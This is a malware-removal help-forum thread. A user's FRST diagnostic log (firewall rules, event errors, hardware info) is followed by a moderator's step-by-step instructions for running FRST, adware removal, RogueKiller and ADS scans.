FirewallRules: [{9BBFB2A1-C43A-4045-B3A3-ACD7E13F68DB}] => C:\Program Files (x86)\Steam\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{D8CF2FAB-FEF7-43DA-8AA0-D751032660C1}] => C:\Program Files (x86)\Steam\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{E0BF2ADF-5A84-4DD9-909B-5C25495128E4}] => C:\Program Files (x86)\Steam\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{21959B4C-4894-4B1E-8ED7-CA754D242FB8}] => C:\Program Files (x86)\Steam\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{0F463632-767A-4694-AA4D-1130016023EC}] => C:\Program Files (x86)\Steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{F81897AC-0F13-4F5B-8AAA-F9E5941B0E80}] => C:\Program Files (x86)\Steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{D4186E61-7F0B-4498-A506-66B336F15586}] => C:\Program Files (x86)\Steam\steamapps\common\Source SDK Base\hl2.exe
FirewallRules: [{CFE2127B-8C4F-4A98-9AB0-363AEF6B4D4F}] => C:\Program Files (x86)\Steam\steamapps\common\Source SDK Base\hl2.exe
FirewallRules: [{FA2F003E-013B-4ED1-A19F-AA27E3741D7D}] => C:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{85AB9F95-F314-496F-887B-BA04621F2A88}] => C:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{88893EF9-8113-4682-A274-A8BD8DBFAC41}] => C:\Program Files (x86)\CyberLink\PowerDVD15\PowerDVD.exe
FirewallRules: [{EDC55ED1-3BB0-4A21-BC37-4CFAEDD998AB}] => C:\Program Files (x86)\CyberLink\PowerDVD15\Kernel\DMS\CLMSServerPDVD15.exe
FirewallRules: [{4BF4E973-701C-46B4-973A-7ECEA561470D}] => C:\Program Files (x86)\CyberLink\PowerDVD15\PowerDVD15Agent.exe
FirewallRules: [{DC47FEC4-972C-4EE1-878A-5BA554DC3A1A}] => C:\Program Files (x86)\CyberLink\PowerDVD15\Movie\PowerDVDMovie.exe
FirewallRules: [{6A36837F-66E9-48D5-8595-B3355BC20598}] => C:\Program Files (x86)\CyberLink\PowerDVD15\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{475D6679-BCC4-4C45-9277-F72DAC052E88}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F2FDEF33-65C6-47FA-B5A2-D4D34CF8F903}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5B1AF849-44D2-417D-A5E4-A57336383392}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{EA1A0A04-9CCB-4A0B-B9AA-D51A2B8FDFCC}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{8D9C9156-6CA1-466B-A295-CB992BF62EA6}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{78511B6B-1D0C-4E9F-A24A-C218B19736EA}C:\users\nathan\appdata\roaming\spotify\spotify.exe] => C:\users\nathan\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{8085D73F-98A2-4291-98F2-9B4FA50569E5}C:\users\nathan\appdata\roaming\spotify\spotify.exe] => C:\users\nathan\appdata\roaming\spotify\spotify.exe
FirewallRules: [{92950A30-5191-4B23-86A4-8A518C326A24}] => C:\Program Files (x86)\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{1A3F0BD3-2C16-4699-9040-35DDF785C966}] => C:\Program Files (x86)\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{900123BC-ED39-429D-993A-FCAD4C64010E}] => C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{8CF8982B-2188-4670-9D3E-319456DF5813}] => C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{67DB956A-B768-4109-A41C-7ECF24059E60}] => C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{11362B7C-A237-4C9B-859B-EA23841A9FA9}] => C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{9CD3779A-2207-4A45-B3EB-EB64DF6193E4}] => C:\Program Files (x86)\Steam\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{257D9F98-468A-46EA-83CD-06956BBE8C89}] => C:\Program Files (x86)\Steam\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{BB690911-FD31-49B2-93F8-414B55B83667}] => C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{8000CF6E-421D-4B1B-A154-DEB8216A8912}] => LPort=2869
FirewallRules: [{609A7614-5928-4B1F-95CF-3BCC82D2715C}] => LPort=1900
FirewallRules: [{07F656AF-F3AC-4D4F-A1C5-41C9ACE9DFB0}] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{A9AD5262-E5E4-4D4D-ADF4-5EF1503987F2}C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe] => C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe
FirewallRules: [UDP Query User{4A0AB5C4-8229-4322-B3BB-3A6F515658F7}C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe] => C:\program files (x86)\steam\steamapps\common\arma 3\arma3.exe
FirewallRules: [{1228CDA5-42CB-4B16-AEDC-316EA4E668A0}] => C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto 3\gta3.exe
FirewallRules: [{8BB4784B-2185-480C-9323-F9A998162EDC}] => C:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto 3\gta3.exe
FirewallRules: [{12A4DC8C-C234-4053-B442-7027C7075ABA}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [{D571B795-9C15-44F6-ABA2-829FA2FDA725}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [TCP Query User{5139842E-2D53-4B5B-A669-6E659D851791}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{3B56F595-7789-492A-B851-72A092FDAD88}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{26EDC930-0D2B-4224-B853-6EB61A5A5382}] => C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{FE812AC5-6FDF-420D-83D3-D6C91D8E126A}] => C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{3E441CF9-91A9-42C1-B7C8-E21C4127A8ED}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D2B17295-D6BA-48ED-8A61-6953DDA3E583}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2171A234-9D14-46ED-B1FE-EC6A675530FD}] => C:\Program Files (x86)\Steam\steamapps\common\Men of War Assault Squad 2\mowas_2.exe
FirewallRules: [{C4BD9557-A5EA-4AE1-865C-1C2A1379DE7D}] => C:\Program Files (x86)\Steam\steamapps\common\Men of War Assault Squad 2\mowas_2.exe
FirewallRules: [{34958C3B-12C7-4135-8F8F-F10BF8521F14}] => C:\Program Files (x86)\Steam\steamapps\common\Men of War Assault Squad 2\mowas_2_ed.exe
FirewallRules: [{B2B027A2-9372-4E72-A1B5-88DBEC303C88}] => C:\Program Files (x86)\Steam\steamapps\common\Men of War Assault Squad 2\mowas_2_ed.exe
FirewallRules: [{F55BBB65-1C89-4AF7-A767-587DB8524F7F}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2016\fm.exe
FirewallRules: [{B81DDA4E-B749-4D00-88BD-21B3A0A08BEB}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2016\fm.exe
FirewallRules: [{CAAB8535-6046-4220-9D7B-84140CAD3B7C}] => C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{79B739B9-C501-4B35-AF51-2CF06E150CF0}] => C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [TCP Query User{180B7B6B-2F0D-4249-A720-05F72054D79C}C:\program files (x86)\steam\steamapps\common\fallout 4\fallout4.exe] => C:\program files (x86)\steam\steamapps\common\fallout 4\fallout4.exe
FirewallRules: [UDP Query User{89A4D936-1C28-4FB7-92C6-2F70BA2360BB}C:\program files (x86)\steam\steamapps\common\fallout 4\fallout4.exe] => C:\program files (x86)\steam\steamapps\common\fallout 4\fallout4.exe
FirewallRules: [{187CB45E-1A65-455D-BBE9-2F515716BEF5}] => C:\Program Files (x86)\LucasArts\Star Wars Battlefront\GameData\battlefront.exe
FirewallRules: [{61B84FF9-FC32-412E-9DB6-CDE060FCEC1A}] => C:\Program Files (x86)\LucasArts\Star Wars Battlefront\GameData\battlefront.exe
FirewallRules: [{8D7FBA09-9993-46CB-AAE1-F38F0655ED73}] => C:\Program Files (x86)\Steam\steamapps\common\Star Wars Battlefront II\GameData\BattlefrontII.exe
FirewallRules: [{FFB5D0B7-AA9B-4FCE-BC1D-5A168C8D31B1}] => C:\Program Files (x86)\Steam\steamapps\common\Star Wars Battlefront II\GameData\BattlefrontII.exe
FirewallRules: [{BC403F36-1843-4A7C-BC2E-C76D7DAE12BA}] => C:\Program Files (x86)\Steam\steamapps\common\deadrising3\deadrising3.exe
FirewallRules: [{F2046706-2F5C-40C5-B60D-ADFCB4C8E243}] => C:\Program Files (x86)\Steam\steamapps\common\deadrising3\deadrising3.exe
FirewallRules: [TCP Query User{59FB14C4-A0C4-49BD-8ADF-1735F0937134}C:\program files\rockstar games\grand theft auto v\gta5.exe] => C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{ACD4E0E6-41B1-43CB-A65B-7F3825F9DEDB}C:\program files\rockstar games\grand theft auto v\gta5.exe] => C:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{E86AF6F7-EA87-4EDC-8FF6-81FC69976489}] => C:\Program Files (x86)\Steam\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{DC9ABA06-A234-41CE-8B24-01924BAF2DBD}] => C:\Program Files (x86)\Steam\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{EC17003C-48C5-4644-AF23-AD46FC87C9C3}] => C:\Users\Nathan\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{7E4D7D6D-DF37-44C2-B55F-7762502580A8}] => C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe
FirewallRules: [{FC413FEF-4B85-4F93-A815-88B2ABADE6BB}] => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{BBCEE9D7-78B3-49E6-8013-6E6F53B39055}] => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{8BDAE1E8-0AFE-4CEF-896D-E3D25380E7BA}] => C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{90B36B1C-596F-4D53-A667-A5441A9B5BCC}] => C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{C851E4E7-55B4-491C-900F-214EAB3750EF}] => C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{FA11EB84-3807-42AE-9AE4-E0B4E10ABCF4}] => C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{BDB02BA9-532A-414F-A499-C5557EE3E1F4}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2016 Editor\editor.exe
FirewallRules: [{A164A1F0-BC3A-4336-B1B2-267C01CC5983}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2016 Editor\editor.exe
FirewallRules: [{B14C8ED9-8E7F-424C-BFE2-D53A022E6951}] => C:\Program Files (x86)\Steam\steamapps\common\Controller Companion\ControllerCompanion.exe
FirewallRules: [{2F4FF8D5-E520-414C-A612-3B30F3AB5D49}] => C:\Program Files (x86)\Steam\steamapps\common\Controller Companion\ControllerCompanion.exe
FirewallRules: [{2C189AE9-5632-45F7-BB02-09E7291CAC4B}] => C:\Program Files (x86)\Steam\steamapps\common\Game Dev Tycoon\nw.exe
FirewallRules: [{C780EF49-EDB0-42A1-B5D2-5E633C3E055E}] => C:\Program Files (x86)\Steam\steamapps\common\Game Dev Tycoon\nw.exe
FirewallRules: [{2C6D361D-25CD-40B2-A986-9569034D0235}] => C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{EFA023A9-6851-44F1-B467-190D0090529F}] => C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{E6C1FE0B-F64C-4957-A25B-8708B63C6081}] => C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{7AB2CACD-2DA1-41E6-B04A-9DC8650FE9C9}] => C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{A20E77C5-46A3-4EBA-9DD5-9D6AA595E04F}] => C:\Program Files (x86)\Steam\steamapps\common\Football Tactics\game.exe
FirewallRules: [{154B8D52-7783-4842-8B5D-A24F4F24C167}] => C:\Program Files (x86)\Steam\steamapps\common\Football Tactics\game.exe
FirewallRules: [{F6A91F8F-5F34-448C-AE14-897F48BEDF62}] => C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{D5D329CE-3308-4755-A948-2372EC0A248C}] => C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{A9DDA185-097F-41E2-893C-0D2F86E96170}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1D8559D6-7FDB-4A53-A8D9-45E528B5D52F}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2B307223-9A2B-4F89-AA94-06BA3758B551}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{79195596-8753-4552-8B03-3E4CB2E6FD38}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{4D9CD88E-1A0B-4837-8383-AF6211F39F18}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{678F38F7-1147-4F5C-AD06-BA8E09F10430}] => C:\Users\Nathan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{A053D502-D737-48F4-A48A-C1B8862E0B9D}] => C:\Program Files (x86)\Steam\steamapps\common\Lords of Football\LoF.exe
FirewallRules: [{7167B163-A505-4936-AB2C-5774B8850962}] => C:\Program Files (x86)\Steam\steamapps\common\Lords of Football\LoF.exe
FirewallRules: [{5E279FD0-635C-46DA-9205-E885777863E6}] => C:\Program Files (x86)\Steam\steamapps\common\Lords of Football\DbEditor.exe
FirewallRules: [{9C7F0E22-40E6-466E-8DFA-843804E50FCA}] => C:\Program Files (x86)\Steam\steamapps\common\Lords of Football\DbEditor.exe
FirewallRules: [{45B726FD-925F-4BCB-8DC3-535685F53C4B}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2017\fm.exe
FirewallRules: [{B25C5F59-C315-4345-BE27-9C348758C732}] => C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2017\fm.exe
FirewallRules: [{0115A883-77BA-4D4F-BCD4-910BCF779EDB}] => C:\Program Files (x86)\Steam\steamapps\common\Dishonored\Binaries\Win32\Dishonored.exe
FirewallRules: [{7F2DDC55-1581-4B58-90B1-7471A2857CFF}] => C:\Program Files (x86)\Steam\steamapps\common\Dishonored\Binaries\Win32\Dishonored.exe
FirewallRules: [{8FACCD35-5F22-4F9B-A641-35E199916001}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{FB69330A-394B-4BC7-9064-65B48352E643}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{459A2900-08A5-4258-AD0E-FE3E8ED4AF8D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{20564E5A-0072-4A40-A2A5-94A230619CDF}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E418134F-3920-479D-8AC5-148FA252093C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EC7B84B6-2FA0-447D-95E0-821265725647}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4CB3EE33-59AD-4269-9500-0D3D71860858}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{2D30AC35-124B-489B-B17A-8039977594B4}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{5491E7DF-1711-493A-B8A4-FF607897136B}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSixGame.exe
FirewallRules: [{468F804B-2261-45DE-80AA-C9DF1DF85777}] => C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSixGame.exe
FirewallRules: [{D638919C-8D1F-45D8-A153-F49E73EC1007}] => C:\Program Files (x86)\Steam\steamapps\common\OOTP Baseball 15\ootp15.exe
FirewallRules: [{A0098842-A456-404D-8116-B557E1277C9E}] => C:\Program Files (x86)\Steam\steamapps\common\OOTP Baseball 15\ootp15.exe
FirewallRules: [{5C28FC30-5C3C-4308-A9BC-0808316DCD19}] => C:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{D0F451D2-40A3-4C19-B66F-4924574BD1C7}] => C:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{35CE5AB1-2E6B-416E-9865-FD01B8AAA7A8}] => C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{106CC18E-D38C-4298-9882-76923A77219B}] => C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{BAF5C37A-754F-4CCE-9213-6EC9ABB3026A}] => C:\Program Files (x86)\Steam\steamapps\common\TOXIKK\Binaries\ToxikkLauncher.exe
FirewallRules: [{59FB4814-79A9-4130-9B4C-54AD3C577E48}] => C:\Program Files (x86)\Steam\steamapps\common\TOXIKK\Binaries\ToxikkLauncher.exe
FirewallRules: [{1044BA16-2A78-4CB2-8A7B-3EF002E0A8E4}] => C:\Program Files (x86)\Steam\steamapps\common\Total War SHOGUN 2\Shogun2.exe
FirewallRules: [{7EE795E4-271A-47F5-A9C6-4D88CAC4768C}] => C:\Program Files (x86)\Steam\steamapps\common\Total War SHOGUN 2\Shogun2.exe
FirewallRules: [{EF4B86DC-18B9-4D45-9467-C6EA3C1700AF}] => C:\Program Files (x86)\Steam\steamapps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{DF50624B-A36D-4F36-B17E-52C862413296}] => C:\Program Files (x86)\Steam\steamapps\common\Planet Coaster\PlanetCoaster.exe

==================== Restore Points =========================

11-12-2016 16:32:22 Removed DriverUpdate
11-12-2016 16:35:01 Removed Java 8 Update 60
11-12-2016 16:35:13 Removed Java 8 Update 60
11-12-2016 17:07:39 JRT Pre-Junkware Removal
11-12-2016 17:08:43 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: Unknown USB Device (Device Descriptor Request Failed)
Description: Unknown USB Device (Device Descriptor Request Failed)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service:
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.

Name: AT2020USB+
Description: USB Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: (Generic USB Audio)
Service: usbaudio
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/12/2016 02:52:15 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/12/2016 02:51:45 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/12/2016 02:49:31 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000

Error: (12/12/2016 02:49:31 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000

Error: (12/12/2016 02:49:24 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000

Error: (12/12/2016 02:49:24 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000

Error: (12/12/2016 02:38:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/12/2016 02:31:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/12/2016 02:30:11 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/12/2016 02:30:08 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (12/12/2016 02:14:20 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (12/12/2016 02:08:25 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: The computer has rebooted from a bugcheck. The bugcheck was: 0x00000124 (0x0000000000000000, 0xffff9f0a0d83c028, 0x00000000bf800000, 0x0000000000000124). A dump was saved in: C:\WINDOWS\MEMORY.DMP. Report Id: f7e89ccc-0772-48f0-b42b-f9acdab70711.

Error: (12/12/2016 02:08:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The luafv service failed to start due to the following error:
This driver has been blocked from loading

Error: (12/12/2016 02:08:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 13:37:26 on ‎12/‎12/‎2016 was unexpected.

Error: (12/12/2016 12:58:30 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (12/12/2016 12:57:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The luafv service failed to start due to the following error:
This driver has been blocked from loading

Error: (12/12/2016 12:57:26 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 17:46:10 on ‎11/‎12/‎2016 was unexpected.

Error: (12/12/2016 12:57:21 PM) (Source: Microsoft-Windows-Kernel-Boot) (EventID: 29) (User: NT AUTHORITY)
Description: 32212256841071248

Error: (12/11/2016 05:08:48 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.

Error: (12/11/2016 05:07:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 1000 milliseconds: Restart the service.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Percentage of memory in use: 34%
Total physical RAM: 16325.85 MB
Available physical RAM: 10636.39 MB
Total Virtual: 17349.85 MB
Available Virtual: 12406.91 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:930.96 GB) (Free:141.2 GB) NTFS
Drive e: (Rainbow Six Siege Disc 3) (CDROM) (Total:3.13 GB) (Free:0 GB) UDF

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================
 

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
FRST Fix.


Download attached fixlist.txt file and save it to the Desktop. NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST/FRST64 and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.


Adware Removal Tool Scan.

Download Adware removal tool to your desktop, right click the icon and select Run as Administrator.



Hit Ok.



Hit next make sure to leave all items checked, for removal.



The Program will close all open programs to complete the removal, so save any work and hit OK. Then hit OK after the removal process is complete, thenOK again to finish up. Post log generated by tool.


Re-Run Rogue Killer

Rogue Killer Scan.


Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double click on downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Delete.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
ADS SCAN.

Download ADS to your desktop.
Right Click Run As Administrator.
Click on Listing.
ADS.PNG

A file named Services_List Will appear on your desktop.
Please copy the content of that, and paste it in your next reply.




 

Attachments

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
Also, you are Running FRST from C:\Users\Nathan\Downloads
FRST needs to be on your Desktop, along with the fixlist; in order for the tool to work correctly. ------ "C:\Users\User Name\Desktop"


 
Status
Not open for further replies.